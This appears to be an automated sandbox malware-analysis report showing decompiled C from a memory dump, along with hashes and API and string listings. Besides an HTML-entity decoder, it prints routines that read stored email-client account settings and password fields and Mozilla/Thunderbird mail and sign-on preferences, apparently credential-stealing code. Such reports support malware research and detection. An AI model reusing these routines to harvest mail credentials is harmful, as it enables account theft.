                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Version
                                                  • String ID:
                                                  • API String ID: 1889659487-0
                                                  • Opcode ID: 0048191c24760b141b6f0d3a59878a03bd3f353eaae137afec5afafb810283da
                                                  • Instruction ID: e834d2f23b9aa43ef3af26d4b93615f57df44b07edf01049b3dc0679de2eed13
                                                  • Opcode Fuzzy Hash: 0048191c24760b141b6f0d3a59878a03bd3f353eaae137afec5afafb810283da
                                                  • Instruction Fuzzy Hash: 7DC08C34548220BBC3105F28BC09BC136B8AB0A3A2F01C876E904E6352C3B80C41CBEC
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

C-Code - Quality: 99%
			// HTML entity decoder: copies src (_a8) to dst (_a4), replacing &amp;
			// &lt; &gt; &quot; &nbsp; &apos; and the 95 Latin-1 named entities
			// (&iexcl; .. &yuml;). _a12 caps the number of src bytes consumed
			// (0xffffffff = no cap), _a16 != 0 folds runs of bytes <= 0x20 into one
			// space, _a20 != 0 drops a leading and a trailing space. A "&#" numeric
			// reference branches to code past the end of this listing. Returns a
			// pointer to the terminating NUL written into dst.
			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                  				signed int _v8;
                                                  				void* _v11;
                                                  				char _v12;
                                                  				char _v13;
                                                  				char _v19;
                                                  				char _v20;
                                                  				char _v21;
                                                  				char _v22;
                                                  				char _v23;
                                                  				char _v24;
                                                  				signed int _v28;
                                                  				short _v30;
                                                  				short _v32;
                                                  				char* _v36;
                                                  				char* _v40;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v52;
                                                  				char* _v56;
                                                  				char* _v60;
                                                  				char* _v64;
                                                  				char _v76;
                                                  				void _v88;
                                                  				intOrPtr _v92;
                                                  				char* _v96;
                                                  				char* _v100;
                                                  				intOrPtr _v104;
                                                  				char* _v108;
                                                  				char* _v112;
                                                  				char* _v116;
                                                  				char* _v120;
                                                  				char* _v124;
                                                  				intOrPtr _v128;
                                                  				char* _v132;
                                                  				char* _v136;
                                                  				char* _v140;
                                                  				char* _v144;
                                                  				char* _v148;
                                                  				char* _v152;
                                                  				intOrPtr _v156;
                                                  				char* _v160;
                                                  				char* _v164;
                                                  				char* _v168;
                                                  				intOrPtr _v172;
                                                  				char* _v176;
                                                  				char* _v180;
                                                  				char* _v184;
                                                  				char* _v188;
                                                  				char* _v192;
                                                  				char* _v196;
                                                  				intOrPtr _v200;
                                                  				char* _v204;
                                                  				char* _v208;
                                                  				char* _v212;
                                                  				char* _v216;
                                                  				char* _v220;
                                                  				char* _v224;
                                                  				char* _v228;
                                                  				intOrPtr _v232;
                                                  				char* _v236;
                                                  				char* _v240;
                                                  				char* _v244;
                                                  				char* _v248;
                                                  				char* _v252;
                                                  				intOrPtr _v256;
                                                  				char* _v260;
                                                  				char* _v264;
                                                  				char* _v268;
                                                  				char* _v272;
                                                  				char* _v276;
                                                  				char* _v280;
                                                  				intOrPtr _v284;
                                                  				char* _v288;
                                                  				char* _v292;
                                                  				char* _v296;
                                                  				intOrPtr _v300;
                                                  				char* _v304;
                                                  				char* _v308;
                                                  				char* _v312;
                                                  				char* _v316;
                                                  				char* _v320;
                                                  				char* _v324;
                                                  				intOrPtr _v328;
                                                  				char* _v332;
                                                  				char* _v336;
                                                  				char* _v340;
                                                  				char* _v344;
                                                  				char* _v348;
                                                  				char* _v352;
                                                  				char* _v356;
                                                  				char* _v360;
                                                  				char* _v364;
                                                  				intOrPtr _v368;
                                                  				intOrPtr _v372;
                                                  				char* _v376;
                                                  				char* _v380;
                                                  				intOrPtr _v384;
                                                  				char* _v388;
                                                  				char* _v392;
                                                  				intOrPtr _v396;
                                                  				intOrPtr _v400;
                                                  				char* _v404;
                                                  				char* _v408;
                                                  				intOrPtr _v412;
                                                  				char* _v416;
                                                  				char* _v420;
                                                  				char* _v424;
                                                  				char* _v428;
                                                  				intOrPtr _v432;
                                                  				intOrPtr _v436;
                                                  				char* _v440;
                                                  				intOrPtr _v444;
                                                  				char* _v448;
                                                  				char* _v452;
                                                  				char* _v456;
                                                  				char* _v460;
                                                  				intOrPtr _v464;
                                                  				char* _v468;
                                                  				intOrPtr* _t200;
                                                  				char* _t202;
                                                  				char _t203;
                                                  				int _t205;
                                                  				int _t206;
                                                  				intOrPtr _t209;
                                                  				char* _t211;
                                                  				int _t213;
                                                  				void _t216;
                                                  				char _t220;
                                                  				void _t221;
                                                  				int _t226;
                                                  				signed int _t231;
                                                  				intOrPtr* _t232;
                                                  				void _t237;
                                                  				void* _t238;
                                                  				void* _t240;
                                                  				void* _t245;
                                                  				signed int _t246;
                                                  				signed int _t249;
                                                  				int _t250;
                                                  				void* _t251;
                                                  				int _t252;
                                                  				void* _t254;
                                                  				void* _t255;
                                                  				void* _t256;
                                                  
				// Six basic entities (_v64.._v44) and, in the same order, the bytes
				// they decode to (_v24.._v19).
				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;   // '&'
				_v23 = 0x3c;   // '<'
				_v22 = 0x3e;   // '>'
				_v21 = 0x22;   // '"'
				_v20 = 0x20;   // ' '
				_v19 = 0x27;   // '\''
				// 0x5f (95) Latin-1 entity names, _v468.._v92, in code-point order:
				// entry i decodes to byte 0xA1 + i.
				_v468 = "iexcl;";
                                                  				_v464 = "cent;";
                                                  				_v460 = "pound;";
                                                  				_v456 = "curren;";
                                                  				_v452 = "yen;";
                                                  				_v448 = "brvbar;";
                                                  				_v444 = "sect;";
                                                  				_v440 = "uml;";
                                                  				_v436 = "copy;";
                                                  				_v432 = "ordf;";
                                                  				_v428 = "laquo;";
                                                  				_v424 = "not;";
                                                  				_v420 = "shy;";
                                                  				_v416 = "reg;";
                                                  				_v412 = "macr;";
                                                  				_v408 = "deg;";
                                                  				_v404 = "plusmn;";
                                                  				_v400 = "sup2;";
                                                  				_v396 = "sup3;";
                                                  				_v392 = "acute;";
                                                  				_v388 = "micro;";
                                                  				_v384 = "para;";
                                                  				_v380 = "middot;";
                                                  				_v376 = "cedil;";
                                                  				_v372 = "sup1;";
                                                  				_v368 = "ordm;";
                                                  				_v364 = "raquo;";
                                                  				_v360 = "frac14;";
                                                  				_v356 = "frac12;";
                                                  				_v352 = "frac34;";
                                                  				_v348 = "iquest;";
                                                  				_v344 = "Agrave;";
                                                  				_v340 = "Aacute;";
                                                  				_v336 = "Acirc;";
                                                  				_v332 = "Atilde;";
                                                  				_v328 = "Auml;";
                                                  				_v324 = "Aring;";
                                                  				_v320 = "AElig;";
                                                  				_v316 = "Ccedil;";
                                                  				_v312 = "Egrave;";
                                                  				_v308 = "Eacute;";
                                                  				_v304 = "Ecirc;";
                                                  				_v300 = "Euml;";
                                                  				_v296 = "Igrave;";
                                                  				_v292 = "Iacute;";
                                                  				_v288 = "Icirc;";
                                                  				_v284 = "Iuml;";
                                                  				_v280 = "ETH;";
                                                  				_v276 = "Ntilde;";
                                                  				_v272 = "Ograve;";
                                                  				_v268 = "Oacute;";
                                                  				_v264 = "Ocirc;";
                                                  				_v260 = "Otilde;";
                                                  				_v256 = "Ouml;";
                                                  				_v252 = "times;";
                                                  				_v248 = "Oslash;";
                                                  				_v244 = "Ugrave;";
                                                  				_v240 = "Uacute;";
                                                  				_v236 = "Ucirc;";
                                                  				_v232 = "Uuml;";
                                                  				_v228 = "Yacute;";
                                                  				_v224 = "THORN;";
                                                  				_v220 = "szlig;";
                                                  				_v216 = "agrave;";
                                                  				_v212 = "aacute;";
                                                  				_v208 = "acirc;";
                                                  				_v204 = "atilde;";
				_t200 = _a8;                  // src
				_v28 = _v28 | 0xffffffff;     // dst length right after the last space written (-1 = none yet)
				_t231 = 0;                    // dst length
				_t254 = 0;                    // src index
                                                  				_v200 = "auml;";
                                                  				_v196 = "aring;";
                                                  				_v192 = "aelig;";
                                                  				_v188 = "ccedil;";
                                                  				_v184 = "egrave;";
                                                  				_v180 = "eacute;";
                                                  				_v176 = "ecirc;";
                                                  				_v172 = "euml;";
                                                  				_v168 = "igrave;";
                                                  				_v164 = "iacute;";
                                                  				_v160 = "icirc;";
                                                  				_v156 = "iuml;";
                                                  				_v152 = "eth;";
                                                  				_v148 = "ntilde;";
                                                  				_v144 = "ograve;";
                                                  				_v140 = "oacute;";
                                                  				_v136 = "ocirc;";
                                                  				_v132 = "otilde;";
                                                  				_v128 = "ouml;";
                                                  				_v124 = "divide;";
                                                  				_v120 = "oslash;";
                                                  				_v116 = "ugrave;";
                                                  				_v112 = "uacute;";
                                                  				_v108 = "ucirc;";
                                                  				_v104 = "uuml;";
                                                  				_v100 = "yacute;";
                                                  				_v96 = "thorn;";
                                                  				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:                      // end of input: terminate dst, optionally drop one trailing space
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {   // the length cap counts src bytes, not dst bytes
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {       // not '&' (also the path taken for an unrecognised entity)
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {              // whitespace folding: at most one space per run
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {   // trimming: never keep a leading space
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {   // stop at the src NUL
							continue;
						}
						break;
					}
					// '&' seen: _v36 points just past it; the six basic entities are tried first
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));             // basic table, entry _t249
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;                                     // cdecl stack clean-up for the two calls
						if(_t206 == 0) {
							break;            // matched; the replacement write lies past the end of this listing
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {   // not "&#": try the Latin-1 names
							L29:
							_v8 = _v8 & 0x00000000;                   // _v8 = 0
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);  // Latin-1 table, entry _v8
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;     // nothing matched: emit the '&' literally
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;    // truncated to a byte this is 0xA1 + _v8
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;                // skip '&' plus the name (';' included)
							goto L43;
						}
						// "&#": numeric character reference; its handling continues beyond this listing
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
                                                  						if(_t237 == 0x78 || _t237 == 0x58) {
                                                  							_t159 = _t209 + 3; // 0x3
                                                  							_t245 = _t254 + _t159;
                                                  							_t238 = _t245;
                                                  							_t252 = 0;
                                                  							while(1) {
                                                  								_t216 =  *_t238;
                                                  								if(_t216 == 0) {
                                                  									break;
                                                  								}
                                                  								if(_t216 == 0x3b) {
                                                  									L27:
                                                  									if(_t252 <= 0) {
                                                  										goto L29;
                                                  									}
                                                  									memcpy( &_v88, _t245, _t252);
                                                  									 *((char*)(_t255 + _t252 - 0x54)) = 0;
                                                  									_t220 = E00406512( &_v88);
                                                  									_t256 = _t256 + 0x10;
                                                  									 *((char*)(_t231 + _a4)) = _t220;
                                                  									_t231 = _t231 + 1;
                                                  									_t254 = _t254 + _t252 + 4;
                                                  									goto L43;
                                                  								}
                                                  								_t252 = _t252 + 1;
                                                  								if(_t252 >= 4) {
                                                  									break;
                                                  								}
                                                  								_t238 = _t238 + 1;
                                                  							}
                                                  							_t252 = _t252 | 0xffffffff;
                                                  							goto L27;
                                                  						} else {
                                                  							_t240 = _t251;
                                                  							_t246 = 0;
                                                  							while(1) {
                                                  								_t221 =  *_t240;
                                                  								if(_t221 == 0) {
                                                  									break;
                                                  								}
                                                  								if(_t221 == 0x3b) {
                                                  									_v8 = _t246;
                                                  									L18:
                                                  									if(_v8 <= 0) {
                                                  										goto L29;
                                                  									}
                                                  									memcpy( &_v76, _t251, _v8);
                                                  									 *((char*)(_t255 + _v8 - 0x48)) = 0;
                                                  									_t226 = atoi( &_v76);
                                                  									_t256 = _t256 + 0x10;
                                                  									_v32 = _t226;
                                                  									_v12 = 0;
                                                  									asm("stosb");
                                                  									_v30 = 0;
                                                  									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
                                                  									 *((char*)(_t231 + _a4)) = _v12;
                                                  									_t231 = _t231 + 1;
                                                  									_t254 = _t254 + _v8 + 3;
                                                  									goto L43;
                                                  								}
                                                  								_t246 = _t246 + 1;
                                                  								if(_t246 >= 6) {
                                                  									break;
                                                  								}
                                                  								_t240 = _t240 + 1;
                                                  							}
                                                  							_v8 = _v8 | 0xffffffff;
                                                  							goto L18;
                                                  						}
                                                  					}
                                                  					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
                                                  					_t231 = _t231 + 1;
                                                  					_t254 = _t254 + _v8 + 1;
                                                  					goto L43;
                                                  				}
                                                  				goto L45;
                                                  			}

                                                  APIs
                                                  • strlen.MSVCRT ref: 0040FC27
                                                  • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                  • memcpy.MSVCRT ref: 0040FCB3
                                                  • atoi.MSVCRT ref: 0040FCC4
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                  • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                  • API String ID: 1895597112-3210201812
                                                  • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                  • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                  • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                  • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 82%
                                                  			E004106BE(void* __ecx, void* __edx) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				int _t58;
                                                  				int _t59;
                                                  				int _t60;
                                                  				int _t61;
                                                  				int _t63;
                                                  				void* _t96;
                                                  				void* _t99;
                                                  				void* _t102;
                                                  				void* _t105;
                                                  				void* _t108;
                                                  				void* _t111;
                                                  				void* _t114;
                                                  				void* _t117;
                                                  				void* _t123;
                                                  				void* _t194;
                                                  				void* _t196;
                                                  				void* _t201;
                                                  				char* _t202;
                                                  
                                                  				_t194 = __edx;
                                                  				_t201 = __ecx;
                                                  				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
                                                  					_t204 = _t201 + 0x460;
                                                  					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
                                                  					_t123 = E00406B74( *_t204);
                                                  					_t195 = _t201 + 0xf84;
                                                  					E004060D0(0xff, _t201 + 0xf84, _t123);
                                                  				}
                                                  				_t202 = _t201 + 0x46c;
                                                  				if(strcmp(_t202, "POP3_Server") == 0) {
                                                  					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                  					_t195 = _t201 + 0x970;
                                                  					E004060D0(0xff, _t201 + 0x970, _t117);
                                                  				}
                                                  				if(strcmp(_t202, "IMAP_Server") == 0) {
                                                  					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                  					_t195 = _t201 + 0x970;
                                                  					E004060D0(0xff, _t201 + 0x970, _t114);
                                                  				}
                                                  				if(strcmp(_t202, "NNTP_Server") == 0) {
                                                  					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                  					_t195 = _t201 + 0x970;
                                                  					E004060D0(0xff, _t201 + 0x970, _t111);
                                                  				}
                                                  				if(strcmp(_t202, "SMTP_Server") == 0) {
                                                  					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                  					_t195 = _t201 + 0x1084;
                                                  					E004060D0(0xff, _t201 + 0x1084, _t108);
                                                  				}
                                                  				if(strcmp(_t202, "POP3_User_Name") == 0) {
                                                  					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                  					_t195 = _t201 + 0xb70;
                                                  					E004060D0(0xff, _t201 + 0xb70, _t105);
                                                  					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
                                                  				}
                                                  				if(strcmp(_t202, "IMAP_User_Name") == 0) {
                                                  					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                  					_t195 = _t201 + 0xb70;
                                                  					E004060D0(0xff, _t201 + 0xb70, _t102);
                                                  					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
                                                  				}
                                                  				if(strcmp(_t202, "NNTP_User_Name") == 0) {
                                                  					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                  					_t195 = _t201 + 0xb70;
                                                  					E004060D0(0xff, _t201 + 0xb70, _t99);
                                                  					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
                                                  				}
                                                  				if(strcmp(_t202, "SMTP_User_Name") == 0) {
                                                  					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                  					_t195 = _t201 + 0x1284;
                                                  					E004060D0(0xff, _t201 + 0x1284, _t96);
                                                  					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
                                                  				}
                                                  				_t58 = strcmp(_t202, "POP3_Password2");
                                                  				_t214 = _t58;
                                                  				if(_t58 == 0) {
                                                  					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
                                                  				}
                                                  				_t59 = strcmp(_t202, "IMAP_Password2");
                                                  				_t215 = _t59;
                                                  				if(_t59 == 0) {
                                                  					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
                                                  				}
                                                  				_t60 = strcmp(_t202, "NNTP_Password2");
                                                  				_t216 = _t60;
                                                  				if(_t60 == 0) {
                                                  					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
                                                  				}
                                                  				_t61 = strcmp(_t202, "SMTP_Password2");
                                                  				_t217 = _t61;
                                                  				if(_t61 == 0) {
                                                  					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
                                                  				}
                                                  				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
                                                  					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                  				}
                                                  				_t63 = strcmp(_t202, "SMTP_Email_Address");
                                                  				if(_t63 == 0) {
                                                  					_t203 = _t201 + 0x460;
                                                  					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
                                                  					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
                                                  				}
                                                  				_push("SMTP_Port");
                                                  				_t196 = _t201 + 0x46c;
                                                  				_push(_t196);
                                                  				L004115DC();
                                                  				if(_t63 == 0) {
                                                  					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                  					 *(_t201 + 0x168c) = _t63;
                                                  				}
                                                  				_push("NNTP_Port");
                                                  				_push(_t196);
                                                  				L004115DC();
                                                  				if(_t63 == 0) {
                                                  					L35:
                                                  					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                  					 *(_t201 + 0xf78) = _t63;
                                                  				} else {
                                                  					_push("IMAP_Port");
                                                  					_push(_t196);
                                                  					L004115DC();
                                                  					if(_t63 == 0) {
                                                  						goto L35;
                                                  					} else {
                                                  						_push("POP3_Port");
                                                  						_push(_t196);
                                                  						L004115DC();
                                                  						if(_t63 == 0) {
                                                  							goto L35;
                                                  						}
                                                  					}
                                                  				}
                                                  				_push("SMTP_Secure_Connection");
                                                  				_push(_t196);
                                                  				L004115DC();
                                                  				if(_t63 == 0) {
                                                  					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                  					 *(_t201 + 0x1690) = _t63;
                                                  				}
                                                  				_push("NNTP_Secure_Connection");
                                                  				_push(_t196);
                                                  				L004115DC();
                                                  				if(_t63 == 0) {
                                                  					L41:
                                                  					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
                                                  				} else {
                                                  					_push("IMAP_Secure_Connection");
                                                  					_push(_t196);
                                                  					L004115DC();
                                                  					if(_t63 == 0) {
                                                  						goto L41;
                                                  					} else {
                                                  						_push("POP3_Secure_Connection");
                                                  						_push(_t196);
                                                  						L004115DC();
                                                  						if(_t63 == 0) {
                                                  							goto L41;
                                                  						}
                                                  					}
                                                  				}
                                                  				return 1;
                                                  			}
























                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcmp$_stricmp$memcpystrlen
                                                  • String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                  • API String ID: 1113949926-2499304436
                                                  • Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                  • Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
                                                  • Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
                                                  • Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v12;
                                                  				char _v16;
                                                  				void _v271;
                                                  				char _v272;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				int _t64;
                                                  				int _t66;
                                                  				int _t68;
                                                  				int _t69;
                                                  				int _t72;
                                                  				int _t85;
                                                  				void* _t91;
                                                  				void* _t132;
                                                  				char* _t133;
                                                  				char* _t135;
                                                  				char* _t137;
                                                  				char* _t139;
                                                  				intOrPtr _t151;
                                                  				int _t153;
                                                  				int _t154;
                                                  				void* _t155;
                                                  
                                                  				_t132 = __edx;
                                                  				_v12 = __ecx;
                                                  				_v272 = 0;
                                                  				memset( &_v271, 0, 0xff);
                                                  				_t133 = "mail.account.account";
                                                  				_t64 = strlen(_t133);
                                                  				_t148 = _t64;
                                                  				_t134 = _a4;
                                                  				if(strncmp(_a4, _t133, _t64) != 0) {
                                                  					_v8 = _v8 & 0x00000000;
                                                  				} else {
                                                  					_v8 = E0040C748(_t134,  &_v16, _t148);
                                                  				}
                                                  				if(_v8 != 0) {
                                                  					_push("identities");
                                                  					_push(_v8);
                                                  					L004115B2();
                                                  					if(_t91 == 0) {
                                                  						_t17 = _t155 + 0x604; // 0x604
                                                  						E004060D0(0xff, _t17, _a8);
                                                  					}
                                                  				}
                                                  				_t135 = "mail.server";
                                                  				_t66 = strlen(_t135);
                                                  				_t149 = _t66;
                                                  				_t136 = _a4;
                                                  				if(strncmp(_a4, _t135, _t66) != 0) {
                                                  					_v8 = _v8 & 0x00000000;
                                                  				} else {
                                                  					_v8 = E0040C6F3(_t149, _t136,  &_v272);
                                                  				}
                                                  				if(_v8 != 0) {
                                                  					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                  					_push("username");
                                                  					_push(_v8);
                                                  					_t154 = _t85;
                                                  					L004115B2();
                                                  					if(_t85 == 0) {
                                                  						_t28 = _t154 + 0x204; // 0x204
                                                  						_t85 = E004060D0(0xff, _t28, _a8);
                                                  					}
                                                  					_push("type");
                                                  					_push(_v8);
                                                  					L004115B2();
                                                  					if(_t85 == 0) {
                                                  						_t31 = _t154 + 0x504; // 0x504
                                                  						_t85 = E004060D0(0xff, _t31, _a8);
                                                  					}
                                                  					_push("hostname");
                                                  					_push(_v8);
                                                  					L004115B2();
                                                  					if(_t85 == 0) {
                                                  						_t34 = _t154 + 0x104; // 0x104
                                                  						_t85 = E004060D0(0xff, _t34, _a8);
                                                  					}
                                                  					_push("port");
                                                  					_push(_v8);
                                                  					L004115B2();
                                                  					if(_t85 == 0) {
                                                  						_t85 = atoi(_a8);
                                                  						 *(_t154 + 0x804) = _t85;
                                                  					}
                                                  					_push("useSecAuth");
                                                  					_push(_v8);
                                                  					L004115B2();
                                                  					if(_t85 == 0) {
                                                  						_push("true");
                                                  						_push(_a8);
                                                  						L004115B2();
                                                  						if(_t85 == 0) {
                                                  							 *((intOrPtr*)(_t154 + 0x808)) = 1;
                                                  						}
                                                  					}
                                                  				}
                                                  				_t137 = "mail.identity";
                                                  				_t68 = strlen(_t137);
                                                  				_t150 = _t68;
                                                  				_t138 = _a4;
                                                  				_t69 = strncmp(_a4, _t137, _t68);
                                                  				if(_t69 != 0) {
                                                  					_v8 = _v8 & 0x00000000;
                                                  				} else {
                                                  					_t69 = E0040C6F3(_t150, _t138,  &_v272);
                                                  					_v8 = _t69;
                                                  				}
                                                  				if(_v8 != 0) {
                                                  					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
                                                  					_push("useremail");
                                                  					_push(_v8);
                                                  					_t153 = _t69;
                                                  					L004115B2();
                                                  					if(_t69 == 0) {
                                                  						_t51 = _t153 + 0x404; // 0x404
                                                  						_t69 = E004060D0(0xff, _t51, _a8);
                                                  					}
                                                  					_push("fullname");
                                                  					_push(_v8);
                                                  					L004115B2();
                                                  					if(_t69 == 0) {
                                                  						_t54 = _t153 + 4; // 0x4
                                                  						_t69 = E004060D0(0xff, _t54, _a8);
                                                  					}
                                                  				}
                                                  				_push("signon.signonfilename");
                                                  				_push(_a4);
                                                  				L004115B2();
                                                  				if(_t69 == 0) {
                                                  					_t151 = _v12;
                                                  					_t139 = _t151 + 0x245;
                                                  					_t152 = _t151 + 0x140;
                                                  					_t72 = strlen(_t151 + 0x140);
                                                  					_t60 = strlen(_a8) + 1; // 0x1
                                                  					if(_t72 + _t60 >= 0x104) {
                                                  						 *_t139 = 0;
                                                  					} else {
                                                  						E004062AD(_t139, _t152, _a8);
                                                  					}
                                                  				}
                                                  				return 1;
                                                  			}


























                                                  0x0040c9b9
                                                  0x0040c9be
                                                  0x0040c9be
                                                  0x0040c9cb
                                                  0x0040c9da
                                                  0x0040c9df
                                                  0x0040c9e4
                                                  0x0040c9e7
                                                  0x0040c9e9
                                                  0x0040c9f2
                                                  0x0040c9f7
                                                  0x0040c9fd
                                                  0x0040ca02
